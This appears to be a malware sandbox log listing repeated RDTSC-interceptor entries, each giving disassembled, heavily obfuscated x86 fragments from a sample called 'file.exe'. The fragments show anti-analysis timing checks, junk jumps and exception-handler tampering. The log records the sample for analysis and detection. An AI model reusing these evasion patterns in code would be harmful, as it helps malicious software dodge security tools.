                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0014 second address: 55F001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F001A second address: 55F00DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 3A891D3Dh 0x00000010 push esi 0x00000011 pushfd 0x00000012 jmp 00007F450CC4A619h 0x00000017 or si, 0206h 0x0000001c jmp 00007F450CC4A611h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F450CC4A60Ch 0x0000002c sub cx, 10A8h 0x00000031 jmp 00007F450CC4A60Bh 0x00000036 popfd 0x00000037 jmp 00007F450CC4A618h 0x0000003c popad 0x0000003d xchg eax, ebp 0x0000003e jmp 00007F450CC4A610h 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F450CC4A60Dh 0x0000004e sub ah, 00000026h 0x00000051 jmp 00007F450CC4A611h 0x00000056 popfd 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00DC second address: 55F00E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00E2 second address: 55F0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A60Ch 0x00000014 sbb cl, 00000028h 0x00000017 jmp 00007F450CC4A60Bh 0x0000001c popfd 0x0000001d mov ax, F31Fh 0x00000021 popad 0x00000022 call 00007F450CC4A609h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0134 second address: 55F0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F450CC4AB1Fh 0x00000008 pop esi 0x00000009 jmp 00007F450CC4AB29h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov eax, ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0169 second address: 55F016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F016D second address: 55F0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov bl, 02h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0178 second address: 55F0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F450CC4A60Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0195 second address: 55F0199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0199 second address: 55F019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F019F second address: 55F01C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 5DF2F8B7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F450CC4AB1Dh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e mov ch, bl 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01C8 second address: 55F01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01D8 second address: 55F0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F450CC4AB27h 0x0000000e push 56933E39h 0x00000013 jmp 00007F450CC4AB1Fh 0x00000018 xor dword ptr [esp], 233A1549h 0x0000001f jmp 00007F450CC4AB26h 0x00000024 mov eax, dword ptr fs:[00000000h] 0x0000002a pushad 0x0000002b mov al, A8h 0x0000002d mov eax, edi 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007F450CC4AB22h 0x00000036 mov dword ptr [esp], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F450CC4AB27h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0264 second address: 55F027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov bx, B546h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F027A second address: 55F027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F027E second address: 55F0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0284 second address: 55F0342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F450CC4AB1Eh 0x0000000f push eax 0x00000010 jmp 00007F450CC4AB1Bh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 jmp 00007F450CC4AB24h 0x0000001c jmp 00007F450CC4AB22h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F450CC4AB1Eh 0x0000002a sub cx, 19D8h 0x0000002f jmp 00007F450CC4AB1Bh 0x00000034 popfd 0x00000035 push eax 0x00000036 pushfd 0x00000037 jmp 00007F450CC4AB1Fh 0x0000003c adc esi, 00C5DC9Eh 0x00000042 jmp 00007F450CC4AB29h 0x00000047 popfd 0x00000048 pop esi 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F450CC4AB1Dh 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0342 second address: 55F03E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C6h 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f pushfd 0x00000010 jmp 00007F450CC4A60Ch 0x00000015 and eax, 18A508F8h 0x0000001b jmp 00007F450CC4A60Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007F450CC4A616h 0x00000028 push eax 0x00000029 jmp 00007F450CC4A60Bh 0x0000002e xchg eax, edi 0x0000002f jmp 00007F450CC4A616h 0x00000034 mov eax, dword ptr [75AF4538h] 0x00000039 jmp 00007F450CC4A610h 0x0000003e xor dword ptr [ebp-08h], eax 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F450CC4A60Eh 0x00000048 xor cl, 00000018h 0x0000004b jmp 00007F450CC4A60Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 movzx esi, bx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F03E7 second address: 55F041E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4AB1Bh 0x00000008 sbb esi, 42A78CDEh 0x0000000e jmp 00007F450CC4AB29h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xor eax, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F041E second address: 55F046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F450CC4A60Eh 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A611h 0x00000014 xor ch, 00000076h 0x00000017 jmp 00007F450CC4A611h 0x0000001c popfd 0x0000001d push eax 0x0000001e mov cx, di 0x00000021 pop edx 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 00C29DD6h 0x0000002c mov si, dx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F046F second address: 55F04BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, EFh 0x00000005 mov dh, 28h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d pushad 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007F450CC4AB1Fh 0x00000015 sbb ch, 0000000Eh 0x00000018 jmp 00007F450CC4AB29h 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov ebx, 45062004h 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F04BE second address: 55F04C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F04C4 second address: 55F0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 or cx, 91F6h 0x0000000e jmp 00007F450CC4AB21h 0x00000013 popfd 0x00000014 call 00007F450CC4AB20h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [ebp-18h], esp 0x00000020 jmp 00007F450CC4AB21h 0x00000025 mov eax, dword ptr fs:[00000018h] 0x0000002b jmp 00007F450CC4AB1Eh 0x00000030 mov ecx, dword ptr [eax+00000FDCh] 0x00000036 jmp 00007F450CC4AB20h 0x0000003b test ecx, ecx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F450CC4AB1Eh 0x00000044 jmp 00007F450CC4AB25h 0x00000049 popfd 0x0000004a pushad 0x0000004b mov di, ax 0x0000004e mov ah, 28h 0x00000050 popad 0x00000051 popad 0x00000052 jns 00007F450CC4AB77h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F450CC4AB1Eh 0x00000061 sbb al, 00000068h 0x00000064 jmp 00007F450CC4AB1Bh 0x00000069 popfd 0x0000006a mov edx, esi 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0598 second address: 55F05AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A610h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F05AC second address: 55F0603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007F450CC4AB26h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 jmp 00007F450CC4AB20h 0x0000001a test ecx, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F450CC4AB27h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0010 second address: 55E00AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F450CC4A616h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, si 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F450CC4A616h 0x0000001d or ecx, 2F725958h 0x00000023 jmp 00007F450CC4A60Bh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F450CC4A616h 0x00000031 mov ebp, esp 0x00000033 jmp 00007F450CC4A610h 0x00000038 sub esp, 2Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F450CC4A617h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E00AE second address: 55E00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1DC0733Ah 0x00000008 push ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F450CC4AB1Fh 0x00000016 pop esi 0x00000017 mov dh, 63h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0196 second address: 55E01A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E01A9 second address: 55E01AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E01AD second address: 55E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4A610h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E01C9 second address: 55E0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F450CC4ACA8h 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushfd 0x00000014 jmp 00007F450CC4AB21h 0x00000019 sbb ecx, 51758D66h 0x0000001f jmp 00007F450CC4AB21h 0x00000024 popfd 0x00000025 popad 0x00000026 lea ecx, dword ptr [ebp-14h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0216 second address: 55E021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E021C second address: 55E0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 5687h 0x00000007 mov ecx, 222ED423h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [ebp-14h], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4AB25h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0274 second address: 55E0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0278 second address: 55E027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E027C second address: 55E0282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0282 second address: 55E02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F450CC4AB1Bh 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007F450CC4AB24h 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ah, 2Eh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E02EB second address: 55E038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 adc si, B82Eh 0x0000000e jmp 00007F450CC4A619h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jg 00007F457D108772h 0x0000001d jmp 00007F450CC4A60Dh 0x00000022 js 00007F450CC4A63Dh 0x00000028 jmp 00007F450CC4A60Eh 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 jmp 00007F450CC4A610h 0x00000035 jne 00007F457D108747h 0x0000003b jmp 00007F450CC4A610h 0x00000040 mov ebx, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F450CC4A617h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E038C second address: 55E03C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, BEh 0x00000011 jmp 00007F450CC4AB24h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E03C6 second address: 55E03EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4A612h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E03EB second address: 55E048D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4AB22h 0x00000008 jmp 00007F450CC4AB25h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 mov ax, E53Dh 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c call 00007F450CC4AB22h 0x00000021 mov esi, 57193CE1h 0x00000026 pop esi 0x00000027 mov dl, 60h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c jmp 00007F450CC4AB24h 0x00000031 pushfd 0x00000032 jmp 00007F450CC4AB22h 0x00000037 xor al, FFFFFFD8h 0x0000003a jmp 00007F450CC4AB1Bh 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F450CC4AB20h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E048D second address: 55E0493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0493 second address: 55E0499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0499 second address: 55E049D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E049D second address: 55E04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E04C2 second address: 55E04C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E04C8 second address: 55E0518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB25h 0x00000009 xor ecx, 50100636h 0x0000000f jmp 00007F450CC4AB21h 0x00000014 popfd 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4AB24h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0518 second address: 55E051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E051E second address: 55E052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E052F second address: 55E054B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F450CC4A60Ah 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E054B second address: 55E054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E054F second address: 55E0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D0DD5 second address: 55D0E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4AB1Fh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007F450CC4AB20h 0x00000015 call 00007F450CC4AB22h 0x0000001a call 00007F450CC4AB22h 0x0000001f pop ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F450CC4AB21h 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a jmp 00007F450CC4AB1Ch 0x0000002f pushfd 0x00000030 jmp 00007F450CC4AB22h 0x00000035 or cx, 4328h 0x0000003a jmp 00007F450CC4AB1Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F450CC4AB25h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A31 second address: 55E0A67 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4A60Bh 0x00000008 and ax, 0ADEh 0x0000000d jmp 00007F450CC4A619h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A67 second address: 55E0A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A6D second address: 55E0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A72 second address: 55E0AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007F450CC4AB21h 0x0000000b xor ecx, 3ECC03C6h 0x00000011 jmp 00007F450CC4AB21h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AAB second address: 55E0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AAF second address: 55E0AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AC2 second address: 55E0ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A614h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0ADA second address: 55E0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007F450CC4AB1Eh 0x00000017 xor si, 8128h 0x0000001c jmp 00007F450CC4AB1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007F450CC4AB28h 0x00000028 mov edx, esi 0x0000002a pop ecx 0x0000002b popad 0x0000002c cmp dword ptr [75AF459Ch], 05h 0x00000033 jmp 00007F450CC4AB1Dh 0x00000038 je 00007F457D0F89D3h 0x0000003e pushad 0x0000003f call 00007F450CC4AB1Ch 0x00000044 mov bx, ax 0x00000047 pop ecx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B5C second address: 55E0B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F450CC4A611h 0x00000010 xor eax, 3FD3EC06h 0x00000016 jmp 00007F450CC4A611h 0x0000001b popfd 0x0000001c mov ch, ABh 0x0000001e popad 0x0000001f rdtsc
